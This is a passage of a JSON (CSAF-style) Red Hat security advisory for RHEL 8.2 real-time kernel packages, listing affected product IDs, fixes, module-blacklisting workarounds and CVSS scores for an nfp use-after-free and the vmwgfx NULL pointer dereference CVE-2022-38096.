"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by preventing the affected Netronome Flow Processor (NFP) kernel module from loading during the boot time; ensure the module is added to the blacklist file.\n~~~\nRefer: \nHow do I blacklist a kernel module to prevent it from loading automatically? \nhttps://access.redhat.com/solutions/41278\n~~~",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: nfp: use-after-free in area_cache_get()"
},
{
"cve": "CVE-2022-38096",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"discovery_date": "2022-09-09T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2133452"
}
],
"notes": [
{
"category": "description",
"text": "A NULL pointer dereference issue was found in the Linux kernel\u0027s vmwgfx driver in vmw_cmd_dx_define_query. This flaw allows a local, unprivileged attacker with access to either /dev/dri/card0 or /dev/dri/rendererD128, who can issue an ioctl() on the resulting file descriptor, to crash the system, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Systems making use of the vmwgfx driver are potentially affected by this flaw; systems without the vmwgfx driver loaded are not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-38096"
},
{
"category": "external",
"summary": "RHBZ#2133452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-38096",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38096"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-38096",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38096"
}
],
"release_date": "2022-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "To mitigate this issue, it is possible to prevent the affected code from being loaded by blacklisting the vmwgfx kernel module. For instructions relating to blacklisting a kernel module, please see https://access.redhat.com/solutions/41278.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
